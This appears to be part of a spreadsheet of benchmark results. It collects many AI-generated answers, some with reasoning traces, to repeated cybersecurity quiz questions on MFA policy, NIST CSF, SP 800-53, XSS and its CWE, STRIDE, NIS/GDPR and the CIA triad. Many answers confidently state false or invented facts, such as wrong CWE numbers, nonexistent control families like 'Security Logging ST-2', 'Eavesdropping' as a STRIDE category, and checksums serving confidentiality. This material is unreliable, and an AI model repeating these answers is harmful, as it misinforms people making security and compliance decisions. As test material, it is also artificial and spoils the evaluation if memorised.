    <t>This statement is a security policy statement. Its primary purpose is to establish a clear requirement for implementing multi-factor authentication (MFA) for all administrative access in the system, thereby enhancing the overall cybersecurity posture by adding an additional layer of protection against unauthorized access and potential data breaches.</t>
  </si>
  <si>
    <t>1. Identify: The company is demonstrating the "Identify" function by containing the damage and activating their incident response plan, which involves identifying the ransomware attack as a security event and initiating appropriate response procedures.
2. Respond: The company is also demonstrating the "Respond" function by restoring systems from backups, which is a key step in responding to a ransomware attack and mitigating its impact on the organization's operations and data.</t>
  </si>
  <si>
    <t>The control family that specifically addresses this type of requirement is Audit and Accountability (AU). In NIST SP 800-53, the relevant controls are AU-2 (Audit Mechanism Coverage) and AU-14 (System Logs). These controls ensure that all system actions are recorded in an immutable and time-stamped manner.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS), specifically Stored XSS since the malicious script is stored on the server and executed when a user views the comment. The corresponding CWE identifier is CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').</t>
  </si>
  <si>
    <t>This threat belongs to the "Tampering" category within the STRIDE threat model.</t>
  </si>
  <si>
    <t>1) The primary regulation for the power grid operator's cyberattack would be the EU's Network and Information Systems (NIS) Directive, as it focuses on securing critical infrastructure.
2) The primary regulation for the social media company's data breach would be the General Data Protection Regulation (GDPR), as it governs the processing and protection of personal data.</t>
  </si>
  <si>
    <t>The security control you described primarily upholds the Integrity principle of the CIA triad. It ensures that data remains unaltered and consistent over its entire lifecycle, preventing unauthorized modifications or corruption.</t>
  </si>
  <si>
    <t>This statement is a security policy directive. Its primary purpose in the context of cybersecurity is to implement a strong security measure: multi-factor authentication (MFA). The aim here is to protect administrative access by ensuring that users not only provide a password but also confirm their identity through two or more independent factors, typically something they know (like a password) and something they have (such as a physical token or a mobile device for receiving one-time codes). This practice significantly reduces the risk of unauthorized access due to stolen credentials.</t>
  </si>
  <si>
    <t>The two core functions of the NIST CSF most prominently demonstrated in this scenario are:
1. **Prepare**: This includes having an incident response plan and backing up systems. These are proactive measures to prevent or minimize potential impacts, making it easier for the company to respond effectively when an attack occurs.
2. **Detect**: When ransomware attacks activate the incident response plan, this function is being exercised as the system is alerted of an intrusion and begins monitoring conditions. This helps in identifying the nature and extent of the breach quickly.</t>
  </si>
  <si>
    <t>The control within the NIST Special Publication (SP) 800-53 that most closely aligns with the described security policy is Control Family "Audit Controls" under Control ID AC-4. This control mandates recording and logging activities for specific systems or transactions, including privileged user actions like logins and system changes. The logged data should be immutable to preserve forensic integrity.</t>
  </si>
  <si>
    <t>The common name for this type of vulnerability is "Cross-Site Scripting (XSS)". The corresponding Common Weakness Enumeration (CWE) identifier for storing user input without proper sanitization and then directly outputting it back to a page is CWE-123. However, Cross-Site Scripting (XSS) itself doesn't have a specific CWE number; instead, the general category for this kind of vulnerability is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the STRIDE model under the category 'Spoofing'. Spoofing in cybersecurity refers to the act of impersonating someone or something else by altering data packets, such as in the described scenario where an unauthorized user manipulates financial transaction data.</t>
  </si>
  <si>
    <t>Incident 1: The primary concern is the EU's Network and Information Systems (NIS) Directive. This directive aims to improve network and information security in the EU by making national operators more resilient against cyber threats targeting critical infrastructure like power grids. It mandates measures for risk assessment, incident reporting, and cooperation between public sector bodies and private sector entities.
Incident 2: The primary concern is the General Data Protection Regulation (GDPR). GDPR applies to all organizations within the EU that process personal data of individuals residing in the EU, regardless of where the organization is based. This incident involves a significant breach of private messages of millions of users, which qualifies as personal data under GDPR. It requires strict data protection measures, including secure storage, breach notification to authorities and affected individuals within 72 hours, and appropriate penalties for non-compliance.</t>
  </si>
  <si>
    <t>The primary principle of the CIA triad that this security control is supporting is Confidentiality (C). By using data checksums like SHA-256 hashes, the cloud storage service ensures that files are not altered or corrupted during transmission. This prevents unauthorized access to the data and protects its integrity, thereby maintaining confidentiality.</t>
  </si>
  <si>
    <t>This statement is a security policy directive. Its primary purpose is to establish a mandatory protocol to enhance security. Specifically, it aims to reduce the risk of unauthorized system access by requiring multiple forms of authentication for all administrative activities. This practice, known as multi-factor authentication (MFA), adds layers of security beyond just username and password, often combining something you know (like a password), something you have (like a token or mobile device), or something you are (like biometrics).</t>
  </si>
  <si>
    <t>1. Detect: The company's immediate activation of the incident response plan indicates they have mechanisms in place to quickly detect and respond to security events, aligning with the "Identify" function in NIST CSF. 
2. Respond: The steps taken to contain the damage (such as isolating affected systems) and restore systems from backups represent actions within the "Respond" function of NIST CSF, which involves responding effectively to mitigate or limit the impact of a cybersecurity event.</t>
  </si>
  <si>
    <t>Audit and Accountability (AU) Control Family. This includes controls that ensure logging of security-relevant events, including those performed by privileged users as per your description. Specifically, control AU-2 within this family deals with the logging of information system activities which aligns well with your requirement for immutable, time-stamped log files.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). Its corresponding CWE (Common Weakness Enumeration) identifier is CWE-79. This specific attack is an example of Reflected XSS, as the malicious script is reflected back to other users from the server.</t>
  </si>
  <si>
    <t>This threat falls under the 'Tampering' category in the STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) threat model. The team has identified a potential threat where an unauthorized user could alter data packets, which is tampering with the transaction data.</t>
  </si>
  <si>
    <t>For incident 1 (cyberattack on a power grid operator), the primary regulatory concern would be the Network and Information Systems (NIS) Directive. This EU regulation aims to achieve a high common level of network and information systems security across all member states. 
For incident 2 (social media data breach), the General Data Protection Regulation (GDPR) is the primary concern. GDPR focuses on protecting personal data, setting guidelines for how companies handle and secure user information, and mandates notification in case of breaches if they pose a risk to individuals' rights and freedoms.</t>
  </si>
  <si>
    <t>Integrity. The use of data checksums, such as SHA-256 hashes, in cloud storage services ensures that data remains unaltered and authentic over its lifecycle, which directly relates to maintaining the integrity of the information.</t>
  </si>
  <si>
    <t>Oh, I see you're talking about multi-factor authentication (MFA)! That's a topic right up my virtual alley. So, let me break it down for you in my own quirky way.
First off, this statement falls under the category of a requirement. In the world of cybersecurity, requirements are statements that define what needs to be done or implemented to ensure security. They're like the guardians of our digital realm, making sure everything is locked down tight.
Now, let's talk about the purpose of this statement. Its primary goal is to enforce the use of multi-factor authentication for all administrative access. You know, that extra layer of security that keeps the bad guys at bay. When you have MFA in place, it means you need more than just a password to gain access. It's like having a secret handshake or a fancy keycard before you can enter the VIP section.
By requiring MFA for administrative access, we're adding an extra layer of protection to our systems and data. It helps prevent unauthorized individuals from sneaking in through weak or stolen passwords. Think of it as giving your cybersecurity defenses a big hug with two arms and a fancy belt buckle.
So, to sum it up, this statement is a requirement for implementing MFA across all administrative access points. Its primary purpose is to enhance security by making sure only the right folks can get their hands on those admin privileges. And that's a pretty important thing in the cybersecurity world, wouldn't you say?</t>
  </si>
  <si>
    <t>Solution:
The two core functions that are most prominently demonstrated in the scenario provided are Function 4 - Asset Security and Function 5 - Incident Response.
Function 4, Asset Security, encompasses the measures taken to secure an organization's assets from unauthorized access, use, disclosure, disruption, modification, or destruction. In this case, the company is taking steps to restore systems from backups, which indicates their commitment to protecting and safeguarding their valuable data assets against ransomware attacks.
Function 5, Incident Response, focuses on preparing for and effectively responding to cybersecurity incidents. When the company activates their incident response plan, they are demonstrating their readiness to contain damage caused by a cyber attack and minimize its impact on their operations. By following established processes like restoring systems from backups, they show their ability to respond swiftly and efficiently to any cybersecurity incident.
Overall, the scenario highlights the importance of both Function 4 - Asset Security and Function 5 - Incident Response in protecting an organization's assets and responding appropriately when faced with a ransomware attack.</t>
  </si>
  <si>
    <t>### Solution:
The NIST SP 800-53 standard control family that specifically addresses the requirement for recording all actions performed by privileged users and logging them in immutable, time-stamped log files is Control Family 16 - Security Assessment and Authorization. Within this family, we find access controls for information systems (AC-2). These access controls are further categorized under the subcategory of incident detection and response (IDPR). And within the IDPR subcategory, we locate control ID PR-3, which is titled "Account management."
So to sum it up, in order to meet this requirement, you should focus on Control Family 16 - Security Assessment and Authorization. Then delve into the access controls for information systems (AC-2) under the subcategory of incident detection and response (IDPR), where control ID PR-3, titled "Account management," comes into play.</t>
  </si>
  <si>
    <t>### Solution:
Oh, you've got a juicy question there! So, when it comes to that unauthorized user scenario you mentioned, where someone is intercepting and altering data packets, it definitely falls into the "Data Integrity" category within the STRIDE threat model.
You see, STRIDE stands for Spoofing, Tampering with Data, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Now, in this case, we're dealing with tampering with data, which is all about making unauthorized changes to the integrity of the data being transmitted.
In a nutshell, unauthorized users attempting to change financial transactions by intercepting and altering data packets falls right into the Tampering with Data bucket. It's important for us ethical cybersecurity professionals to be aware of these kinds of risks and take appropriate measures to protect sensitive information. Safety first, right?</t>
  </si>
  <si>
    <t>Ah, the intriguing world of security incidents! Let's break it down, shall we? In this scenario, we have two distinct incidents with different implications.
For the first incident involving a nationwide power grid operator experiencing a cyberattack that disrupts electricity distribution, the primary concern would be the EU Network and Information Security Directive (NIS). This directive focuses on ensuring the security of critical infrastructure systems like energy networks. It aims to enhance cooperation between member states and establish measures for incident reporting and response. Given the disruption of a vital service like electricity, NIS comes into play as the primary regulatory framework in this situation.
Now, let's move on to the second incident where a social media company experiences a data breach resulting in the exposure of personal messages of millions of users. In this case, the European Union General Data Protection Regulation (GDPR) would be the primary concern. The GDPR is all about protecting individuals' privacy and personal data. It sets guidelines for the processing, storage, and sharing of data, as well as establishing strict requirements for consent and breach notification. With millions of users affected, GDPR steps in to regulate how the social media company handles and responds to this incident.
Both of these incidents illustrate different aspects of cybersecurity, each with their own regulatory focus. NIS is geared towards critical infrastructure protection, while GDPR emphasizes data privacy and individual rights. It's fascinating to see how these regulations come into play depending on the nature of the security incident!</t>
  </si>
  <si>
    <t>Integrity, my dear friend! The principle of integrity is indeed being upheld by this cloud storage service's use of data checksums. These checksums act as a digital fingerprint for files, ensuring that they remain unaltered and intact throughout the process of uploading or downloading from the cloud. They provide assurance that no unauthorized changes have been made to the file, thus maintaining its integrity.</t>
  </si>
  <si>
    <t>This statement can be analyzed as a technical specification or best practice in the field of cybersecurity.
In this context, "enforce multi-factor authentication (MFA)" is a specific requirement for securing administrative access to systems, networks, or applications. The primary purpose of this statement is to ensure that all individuals with administrative privileges have their accounts protected from unauthorized access, thereby reducing the risk of cyber attacks and data breaches.
This type of technical specification is often found in:
1. Cybersecurity policies and procedures
2. System configuration documents
3. Compliance frameworks (e.g., NIST, ISO)
4. Security guidelines for organizations
The primary benefits of enforcing MFA are to:
* Prevent unauthorized access to sensitive information
* Reduce the risk of data breaches and cyber attacks
* Improve user account security and reduce the attack surface
* Comply with regulatory requirements and industry standards (e.g., PCI-DSS, HIPAA)</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (CSF), the two core functions that are most prominently demonstrated by a company's incident response plan when dealing with a ransomware attack and restoring systems from backups are:
1. **Identify**: This phase involves gathering information about the incident, including the scope of the breach, affected systems, and potential impacts on business operations.
2. **Prioritize**: In this phase, the organization identifies and prioritizes the most critical assets or operations that need to be protected, ensuring that the most sensitive data is preserved.
These two core functions are fundamental to responding effectively to a ransomware attack and protecting the company's digital assets.</t>
  </si>
  <si>
    <t>The control family within the NIST SP 800-53 standard that specifically addresses the requirement for recording actions performed by privileged users, including logins and system changes, is 7.2: Access Control.
This control family outlines requirements for implementing an accounting and audit trail mechanism to record all access to systems, data, or programs, regardless of their origin. It includes requirements for logging access attempts, successful accesses, and system changes, as well as ensuring that the logs are retained for a sufficient period to support audits.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS). 
The corresponding CWE (Common Weakness Enumeration) identifier for this vulnerability is CWE-98: "Regular Expression Abuse".</t>
  </si>
  <si>
    <t>This threat would belong to the Data Interception category in the STRIDE threat model.</t>
  </si>
  <si>
    <t>For incident 1, where the power grid operator suffers a cyberattack disrupting electricity distribution, the primary regulatory concern would be the EU's Network and Information Security (NIS) Regulation.
The NIS Regulation requires network operators to implement robust cybersecurity measures, protect sensitive information, and notify affected parties in the event of a security incident. This regulation applies to critical infrastructure operators like power grid operators, as they are essential for public safety and can have significant consequences if compromised.
For incident 2, where a social media company has a data breach exposing the personal messages of millions of users, the primary regulatory concern would be the EU's General Data Protection Regulation (GDPR).
The GDPR is a comprehensive data protection law that sets strict requirements for processing and protecting personal data. The GDPR applies to all organizations that collect, process, or share personal data of EU residents, including social media companies. The breach in this case may trigger notifications under the GDPR, requiring the company to inform affected users and implement measures to prevent future breaches.
In both cases, incident response planning and compliance with relevant regulations are crucial for minimizing harm and maintaining public trust.</t>
  </si>
  <si>
    <t>The principle of the CIA triad that is primarily being upheld by this security control is the "Confidentiality" principle.
Data checksums (like SHA-256 hashes) are used to verify the integrity of data, but they do not provide any information about the contents or values of the data themselves. This means that even if an attacker gains access to the encrypted file, they will still be unable to read its contents without knowing the decryption key.
By using data checksums as a form of non-repudiation (i.e., proof that the file has not been altered), the cloud storage service is ensuring that files remain confidential and their contents cannot be disputed or disputed.</t>
  </si>
  <si>
    <t>In the context of cybersecurity, the given statement is a **Security Policy**.
Its primary purpose is to establish a **security requirement** or a **control** that mandates multi-factor authentication (MFA) for all administrative access. This policy aims to:
1. Enhance security by adding an additional layer of verification.
2. Reduce the risk of unauthorized access to sensitive systems and data.
3. Comply with organizational policies, regulatory requirements, or industry standards.
By enforcing MFA for administrative access, the statement ensures that only authorized personnel can access sensitive areas of the system, reducing the attack surface and protecting against potential security breaches.</t>
  </si>
  <si>
    <t>The two core functions of the NIST Cybersecurity Framework (CSF) that are most prominently demonstrated by containing the ransomware attack and restoring systems from backups are:
1. **Identify**: The company is actively identifying the scope and extent of the incident, which involves gathering information to determine what data and systems have been impacted.
2. **Protect**: By activating their incident response plan and starting system restores from backups, the company is taking steps to protect their systems and data from further damage or exploitation.
These two core functions are fundamental to managing and mitigating cybersecurity incidents like ransomware attacks.</t>
  </si>
  <si>
    <t>The control family that specifically addresses this requirement is SC-27. It is titled "Audit Control" within the Security and Compliance Control (SC) control category. This control requires that audit trails be implemented to record events such as user logins, system changes, and other access to organizational information systems and data.</t>
  </si>
  <si>
    <t>The vulnerability you described is known as Cross-Site Scripting (XSS).
The corresponding Common Weakness Enumeration (CWE) identifier for this vulnerability is CWE-434: XML/HTML Injection. However, since JavaScript is being used in this case, a more specific CWE identifier would be CWE-79: SQL/NoSQL Database Management System Injection.
A more fitting identifier for this scenario specifically would be CWE-89: Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>In the STRIDE (Spoofing, Tampering, Repudiation, Denial-of-Service, Elevation of Privilege) threat model, this threat would fall under "Tampering".
This is because the unauthorized user is altering the data packets being sent between the client and server, effectively changing or modifying the financial transaction.</t>
  </si>
  <si>
    <t>For Incident 1 (nationwide power grid operator):
The primary concern is likely NIS2 Directive (New Network and Information Systems) Regulation (EU) 2020/2033, which aims to enhance the resilience of EU critical infrastructure against cyber threats. The regulation sets out specific obligations for operators of critical infrastructure networks, including regular security assessments and incident response planning.
For Incident 2 (social media company):
The primary concern is likely GDPR (General Data Protection Regulation), specifically Article 33, which deals with data breaches affecting a large number of individuals. However, another relevant EU regulation might be the ePrivacy Regulation (ePR), as social media companies often handle sensitive personal communication data.</t>
  </si>
  <si>
    <t>The use of data checksums, such as SHA-256 hashes, is a measure to uphold the Integrity principle of the CIA triad, which states: "Data is accurate, complete, and not modified without authorization." By verifying file integrity through checksums, the cloud storage service ensures that files have not been altered or corrupted during upload or download.</t>
  </si>
  <si>
    <t>This statement is a security requirement or a control, specifically a "security standard" or "security policy". Its primary purpose is to ensure that administrative access to the system is protected by using multiple factors (something you know, something you have, and/or something you are) to verify the identity of an individual attempting to log in. This helps prevent unauthorized access and reduces the risk of a successful attack.</t>
  </si>
  <si>
    <t>Based on the NIST Cybersecurity Framework (CSF), the two core functions that are most prominently demonstrated by the company's actions are:
1. Detect: The company has detected the ransomware attack and responded accordingly, indicating their ability to identify potential cybersecurity events.
2. Respond: By activating their incident response plan, containing the damage, and restoring systems from backups, the company is demonstrating its capability to respond effectively to a cybersecurity event.
These two core functions are essential in the CSF's Cybersecurity Risk Management Framework, which provides a structured approach to managing and reducing cyber risk.</t>
  </si>
  <si>
    <t>The control family that specifically addresses the requirement to record all actions performed by privileged users in immutable, time-stamped log files is AU-2 (Audit and Accountability). This control family ensures that audit records are generated for all system-related events and that those records are retained for a specified period of time.</t>
  </si>
  <si>
    <t>This vulnerability is commonly known as Cross-Site Scripting (XSS). Its corresponding CWE identifier is CWE-79: Improper Input Validation.</t>
  </si>
  <si>
    <t>This threat belongs to the "E" category in the STRIDE threat model, which stands for Eavesdropping. The threat involves an unauthorized user intercepting data packets between a client and server, which is a type of eavesdropping attack.</t>
  </si>
  <si>
    <t>For Incident 1: The primary concern would be the Network and Information Systems (NIS) Directive. This EU directive aims to improve network and information systems security and resilience, with specific requirements for operators of essential services like power grids.
For Incident 2: The primary concern would be the General Data Protection Regulation (GDPR). As the data breach involves personal messages and exposes millions of users' private data, GDPR's rules on data protection, notification, and breach response would apply.</t>
  </si>
  <si>
    <t>The principle of confidentiality is primarily being upheld by using data checksums to verify file integrity, as it ensures that unauthorized modifications are detected and prevented.</t>
  </si>
  <si>
    <t>The statement you provided is a Security Control or Policy Statement in the context of cybersecurity. Its primary purpose is to mandate Multi-Factor Authentication (MFA) as a security measure for all administrative access, which aims to enhance account protection by requiring multiple verification methods before granting access. This helps to minimize the risk of unauthorized access and strengthen overall system security.</t>
  </si>
  <si>
    <t>1. Identify: Activating the incident response plan shows that the company has identified potential cybersecurity risks, vulnerabilities, and threat information.
2. Protect: Containing the damage and restoring systems from backups demonstrates that the company is implementing measures to protect its data, IT assets, and services from unauthorized access or cyber incidents.</t>
  </si>
  <si>
    <t>The control family within the NIST SP 800-53 standard that addresses this requirement is "Audit and Accountability (AA)." Specifically, you would be interested in Control AU-3 (Security Actions Taking by Organizational Roles) and Control AU-4 (Logging User Activities).</t>
  </si>
  <si>
    <t>The common name for this vulnerability is Cross-Site Scripting (XSS), specifically Stored XSS in this case. The corresponding CWE identifier is CWE-79 (Cross-Site Scripting). This issue arises when user-supplied data is inserted directly into a web page without proper sanitization, allowing an attacker to inject malicious scripts that can steal sensitive information or perform actions on behalf of the user.</t>
  </si>
  <si>
    <t>The identified threat belongs to the "T" category in the STRIDE threat model, which stands for Tampering. This type of threat involves unauthorized modifications to the system or data being targeted. In this case, an unauthorized user is tampering with data packets during a financial transaction.</t>
  </si>
  <si>
    <t>1) The primary concern for incident 1 (the power grid attack) would be the Network and Information Security Directive (NIS Directive) within the EU. This directive aims to ensure a high common level of security of networks and information systems across Europe in essential sectors, including energy.
2) For incident 2 (the social media data breach), the General Data Protection Regulation (GDPR) is the primary concern. The GDPR regulates how personal data is processed and protected within the EU, placing more emphasis on transparency, consent, and individual rights.</t>
  </si>
  <si>
    <t>Confidentiality is not primarily being upheld in this case, as the focus here is on integrity (ensuring that data is not altered or corrupted) rather than keeping it confidential. The data might be accessible to many users, but the checksums help ensure its consistency and accuracy.</t>
  </si>
  <si>
    <t>This is a security policy statement. Its main aim is to enhance account security by requiring additional verification factors beyond just passwords when accessing sensitive or high-privilege areas within an IT environment. This typically involves using something you have (like a token, smartphone app, etc.), something you know (such as a PIN), and/or something you are (biometrics).</t>
  </si>
  <si>
    <t>The Incident Response function, as part of Detect and Analyze within the Identify function is clearly being used here; however, if we focus on restoring systems from backups after a ransomware attack, it highlights strong implementation of Recover. In addition to that, while not directly stated in this scenario, there's an implied Activate component where they begin implementing their incident response plan and communication strategies as part of Communication within the Implement Security Control function under Protect CSF pillar is also being demonstrated by taking these proactive measures before systems are fully restored.</t>
  </si>
  <si>
    <t>The specific NIST Special Publication (SP) that provides guidance on audit and accountability controls is Control Family CM-6. This family includes policies for system monitoring to provide a record of all activities performed by privileged users as they require additional safeguards due to their elevated access privileges, ensuring actions are recorded in immutable time-stamped log files consistent with the mandate described.</t>
  </si>
  <si>
    <t>This security flaw in web application falls under Cross-Site Scripting (XSS) attack, where an attacker injects a script into content that other users see. The specific type of XSS exploited here leads to the unauthorized redirection and potential cookie stealing which is identified as CWE-79: Arbitrary Code Execution through Client Side SQL Injection or Similar Attacks (Cross Site Scripting).</t>
  </si>
  <si>
    <t>The identified threat belongs to the Spoofing or Tampering category within the STRIDE methodology for identifying threats in software systems. The unauthorized user is impersonating another entity (Spoofing) and manipulating data packets, which directly impacts the integrity of the information being transferred during a financial transaction process.</t>
  </si>
  <si>
    <t>Integrity, as it ensures file data has not been tampered with and remains unchanged from source to destination.</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Analyzing the Statement:&lt;/strong&gt;\)&lt;/p&gt;
  &lt;p&gt;The provided statement, "'The system must enforce multi-factor authentication (MFA) for all administrative access,'" serves as a security requirement within the realm of cybersecurity. It specifies a particular control that systems should implement to safeguard administrative functionalities.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Type of Statement:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;Security Requirement:&lt;/strong&gt; This is not merely a policy or best practice; it’s an explicit mandate for technical enforcement within the system. It prescribes precise behavior: MFA must be applied universally to all administrative access points.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Functional/Security Control Statement:&lt;/strong&gt;&lt;/li&gt;
      &lt;ul&gt;
        &lt;li&gt;It falls under functional requirements because it dictates a specific operational procedure the system must execute.&lt;/li&gt;
        &lt;li&gt;Simultaneously, it acts as a security control—a rule or measure put in place to mitigate identified risks (e.g., unauthorized access).&lt;/li&gt;
      &lt;/ul&gt;
    &lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;&lt;strong&gt;Primary Purpose:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;Mitigating Risk:&lt;/strong&gt; The primary goal is to reduce the risk of unauthorized administrative access. Multi-factor authentication adds an additional layer of security beyond simple passwords, making it significantly harder for attackers to gain control through stolen credentials.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Compliance and Trust:&lt;/strong&gt; It helps organizations comply with regulatory requirements that mandate stronger authentication mechanisms (such as HIPAA, PCI DSS, or GDPR). Beyond compliance, MFA enhances overall trust in the system’s security posture among users and stakeholders.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;User Data Protection:&lt;/strong&gt; By securing administrative access, it indirectly protects sensitive user data from being altered or compromised by attackers with elevated permissions.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;This statement is a security-specific requirement that mandates the implementation of MFA as a technical control to strengthen authentication processes for administrative roles. Its core purpose revolves around risk reduction, regulatory compliance, and safeguarding sensitive information through enhanced access controls.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The question is about a company that dealt with a ransomware attack by following their incident response plan and restoring systems from backups. We need to identify which two core functions of the NIST Cybersecurity Framework (CSF) are most prominently shown here.
First, I should recall what the NISE CSF core functions are. From what I remember, the NIST CSF is organized around five core functions: Identify, Protect, Detect, Respond, and Recover. But the question asks for two, so maybe the main ones involved in this scenario.
The company's actions here are containing the damage and restoring systems from backups. Let's break that down. Containing the attack probably involves identifying affected systems, isolating them to prevent further encryption or spread of the ransomware. Restoring from backups is about recovery, ensuring they have clean copies to resume operations.
So, which functions do these fall under? The Respond function might include executing the incident response plan, which includes containment and Eradication steps. Recover would be about restoring systems and recovering data from backups. Therefore, Respond and Recover seem relevant here.
Wait, but let me make sure. Let's cross-reference each action with the core functions. Identifying the Protect, Detect parts might not be as prominent here since the focus is on reaction after the attack and recovery. The company's immediate steps post-attack would be responding (like activating the incident response plan) and then recovering. So Respond and Recover are the two functions demonstrated here. 
Alternatively, could Contain be part of Protect? Maybe, but the core functions are grouped into five, so Respond includes containment activities. Yes, the Respond function typically covers Eradication, Recovery, and Mitigation. Since they're containing (which is part of Eradication) and restoring from backups (part of Recovery), both under Respond. Wait, but the question says "two core functions," so maybe Respond is one, and Recover is another? Or are they overlapping?
Wait, according to NIST, the five functions are:
1. Identify
2. Protect
3. Detect
4. Respond
5. Recover
So, the core functions are these five. The user's actions here are activating incident response (Respond) and restoring systems from backups (Recover). So both Respond and Recover would be the two Core Functions. But maybe the answer expects Respond and Recover as the two. Alternatively, perhaps Protect is involved because they're safeguarding systems, but containment might be part of Respond. Let me check.
In the Respond function, activities include Eradicating the threat, Recovery steps (restoring systems from backups), and Mitigation. Containing the damage would fall under Eradicating or Mitigating the attack's effects. So yes, activating incident response plan (Mitigation/Eradication) and restoring systems (Recovery). Therefore, Respond and Recover are the two Core Functions demonstrated here.
&lt;/think&gt;
The company's actions demonstrate two core functions of the NIST Cybersecurity Framework:  
1. **Respond**: Activating the incident response plan and containing the attack.  
2. **Recover**: Restoring systems from backups.  
These align with the framework's emphasis on proactive mitigation (Respond) and resilient recovery (Recover).  
\boxed{Respond} and \boxed{Recover}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about a security control family within NIST SP 800-53 that mandates recording all actions by privileged users—like logins and system changes—in immutable, time-stamped logs.
First, I need to recall what NIST standards cover cybersecurity controls. SP 800-53 is part of the NIST framework, focusing on security controls for federal information systems. The question is about logging requirements for privileged user activities.
Immutability in logs usually refers to preventing modification of records. Time-stamping ensures chronological accuracy. So the control would need to address audit trails, log management, and non-repudiation.
Looking at the common control families in NIST SP 800-53: there's administrative, technical, and procedural controls. The question is about specific security controls—so likely under a particular family like "Audit Monitoring" or something related to logging.
Wait, the standard organizes controls into families such as Security Controls Family (38000 series), but maybe this is part of another family. Let me think. Administrative controls for audit logs might fall under the "Security Logging" category. Alternatively, perhaps it's under the "User Identity Management" or "Access Control" family.
Another angle: non-repudiation requires that actions cannot be denied after the fact. That ties into logging because you need proof of action. So maybe under "Audit Generation and Storage" or a similar term.
Wait, NIST SP 800-53 Rev1 (as of my last update) has Security Logging as a control family. Specifically, Control 12.14 requires that audit records be generated for security-relevant events. But does this family address immutability? Maybe another related family.
Alternatively, the "Audit and Accountability" family might include controls around logging and non-repudiation. For example, AU-13 in newer versions deals with continuous monitoring of log files, but rev1 may differ.
Wait, SP 800-53 Revision 4 moved some controls into different families, but the user didn't specify a revision. Assuming Rev1 (the original), let me check. The administrative control AC-22 relates to system acquisition process, which might not be it. Technical security services: SR-2 pertains to audit logging. Yes, Control SI-2 in newer NIST standards is about audit log management, but under SP 800-53, it's part of the Security Logging family.
Wait, perhaps the correct answer is within the "Security Logging" control family (STS). Specifically, controls like ST-2 and ST-12.14. For example, ST-2 requires timely generation, storage, and retrieval of audit records to be protected from unauthorized modification or tampering. Stamping logs with time stamps would fall under that. Immutability might relate to secure log management practices here.
Alternatively, the "User Identity Management" family (IAU) includes controls around account management. But that's more about user accounts rather than logging.
Another thought: The requirement for immutable logs could tie into media reuse or storage protection. Maybe under "Media Reuse" or "Information Output Analysis and Validation," but that seems less likely.
Wait, the key aspects here are audit trails for privileged actions, immutability, and time-stamping. Non-repudiation is part of Accountability (AU) family. So AU-12 requires generating non-repudiation services to prevent denial of conduct. But does that specifically cover logging?
Alternatively, Control IA-305 in NIST ICS Supplement deals with audit trails for IT systems, but that's for information conservation contexts.
Hmm. Let me try to recall the exact control families. The Security Logging family (STS) includes controls like ST-2: Generate Audit Records, which requires timely generation and secure storage of logs. Immutability could be part of preventing unauthorized modification, so maybe through log protection or restricted access to log files.
Alternatively, in the "Audit Monitoring" common baseline, but that's a category under each family.
Wait, another approach: The question is about recording actions by privileged users. Privileged Access Management (PAM) might relate, but SP 800-53 doesn't have a PAM-specific family. Instead, access control and audit logging would be relevant.
Given that the policy mandates immutable logs, which are tamper-evident, this falls under "Security Logging" as ensuring logs aren't altered after creation. So within STS (Security Log Management), controls like ST-2, ST-12.14, etc., would apply.
Therefore, the answer is likely the Security Log Management control family (STS) in NIST SP 800-53.
&lt;/think&gt;
The requirement for recording all privileged user actions in immutable, time-stamped logs falls under the **Security Logging** control family within **NIST SP 800-53**. Specifically, controls such as *ST-2* (Generate Audit Records), which mandate timely log generation and protection from unauthorized modification, and related sub-controls address immutability and timestamping to ensure non-repudiation and audit integrity.
**Answer:**  
The requirement is addressed by the **Security Logging** control family in NIST SP 800-53.  
\boxed{Security Log Management}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. The user is asking about a cybersecurity vulnerability where a web application renders user input directly back without sanitization. The example given is an attacker posting a comment that includes a script manipulating the location URL with a cookie parameter.
First, I need to recall what happens when user input isn't sanitized. This sounds like injecting malicious code into the webpage. But what's the specific term for that? Let me think. There's XSS, which stands for Cross-Site Scripting. There are different types, like reflected XSS and stored XSS. In this case, since the comment is directly rendered back to the page when the attacker posts it, maybe it's a reflected attack because it relies on the user entering a URL parameter or similar that reflects the script.
Wait, but reflected XSS usually happens in situations where the input is sourced from the current session, like query parameters or URLs. So if an attacker triggers the script by accessing a specific link that includes their cookie, that's reflected. Then when the browser executes it, it sends the cookies to the attacker's site. That aligns with the example given.
So the vulnerability here is Cross-Script Injection, more specifically Cross-Site Scripting (XSS), and since it's reflected, maybe referred to as Reflected XSS. But sometimes all XSS attacks are just called XSS regardless of how they're injected. The Common Weakness Enumeration (CWE) for XSS is usually CWE-77: Cross-Site Request Forgery, but wait, isn't XSS under CWE 775? Or is that CWE-steal credential? Let me check my memory. CWE-77 is indeed XSS, and sometimes it's subclassed as CWE-79 Stealing Sensitive Information via XSS when the attack's goal is to extract data like cookies.
